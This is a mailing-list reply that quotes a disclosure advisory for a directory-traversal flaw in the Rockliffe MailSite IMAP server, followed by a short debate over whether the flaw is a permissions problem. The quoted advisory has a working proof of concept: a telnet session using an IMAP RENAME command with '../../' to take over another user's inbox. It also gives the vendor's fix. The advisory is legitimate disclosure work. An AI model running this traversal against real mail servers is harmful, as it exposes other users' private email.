Re: Rockliffe Directory Transversal Vulnerability

[Josh Zlatin <jzlatin () ramat cc>]

On Wed, 4 Jan 2006, Stan Bubrouski wrote:

> Seeing as most IMAP servers allow you to use ../../ with SELECT, etc..
> (think uw-imapd for example) I think I would categorize this as more
> of a permissions problem.

The Mailsite IMAP server needs to run as the local system account. The
IMAP server can not run as a regular user. Removing write permissions
from the individual IMAP accounts has no effect in stopping users
from stealing directories (such as INBOX) from other accounts.

--
  - Josh

> -sb
>
> On 1/4/06, Josh Zlatin <jzlatin () ramat cc> wrote:
> > Synopsis: Rockliffe's Mailsite Imap Directory Transversal Vulnerability.
> >
> > Product: Rockliffe Mailsite
> >          http://www.rockliffe.com
> >
> > Version: Confirmed on Mailsite < 6.1.22.1
> >
> > Author: Josh Zlatin-Amishav
> >
> > Date: January 4, 2006
> >
> > Background:
> > Rockliffe MailSite secure email server software and MailSite MP secure email
> > gateways provide email server solutions and gateway email protection for
> > businesses and service providers. Rockliffe has more than 3,000 customers
> > hosting more than 15 million mailboxes worldwide.
> >
> > Issue:
> > In working with researchers at Tenable Network Security, I have come across
> > a directory transversal flaw in the IMAP server. It is possible for an
> > authenticated user to access any user's inbox via a RENAME command.
> >
> > PoC:
> >
> > josh@lab1:~$ telnet 10.0.0.5 143
> > Trying 10.0.0.5...
> > Connected to 10.0.0.5.
> > Escape character is '^]'.
> > * OK  MailSite IMAP4 Server 6.1.22.0 ready
> > a1 login joe pass
> > a1 OK LOGIN completed
> > a2 rename ../../josh/INBOX gotcha
> > a2 OK RENAME folder ../../josh/INBOX renamed to gotcha
> > a3 select gotcha
> > * FLAGS (\Answered \Flagged \Deleted \Seen \Draft)
> > * 0 EXISTS
> > * 0 RECENT
> > * OK [PERMANENTFLAGS (\Answered \Flagged \Deleted \Seen \Draft \*)]
> > * OK [UNSEEN 0]
> > * OK [UIDVALIDITY 514563061] UIDs are valid
> > a3 OK [READ-WRITE] opened gotcha
> >
> > user joe can now access the contents of user josh's INBOX directory.
> >
> > Vendor notified: January 3, 2006 06:12AM
> >
> > Vendor Response:
> > Contact your sales rep about purchasing Mailsite 7.0.3.1
> >
> > Solution:
> > Mailsite fixed a buffer overun in the Mailsite IMAP server which also fixes
> > the directory transversal problem. Either upgrade to version 6.1.22 and install
> > the hotfix (i.e. upgrade to 6.1.22.1), or install the latest version of
> > Mailsite. The hotfix can be obtained at:
> >
> > ftp://ftp.rockliffe.com/MailSite/6.1.22/Hotfixes/MailSiteServicePack.exe
> >
> > References: http://www.rockliffe.com
> > References: http://zur.homelinux.com/Advisories/RockliffeMailsiteDirTransveral.txt
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/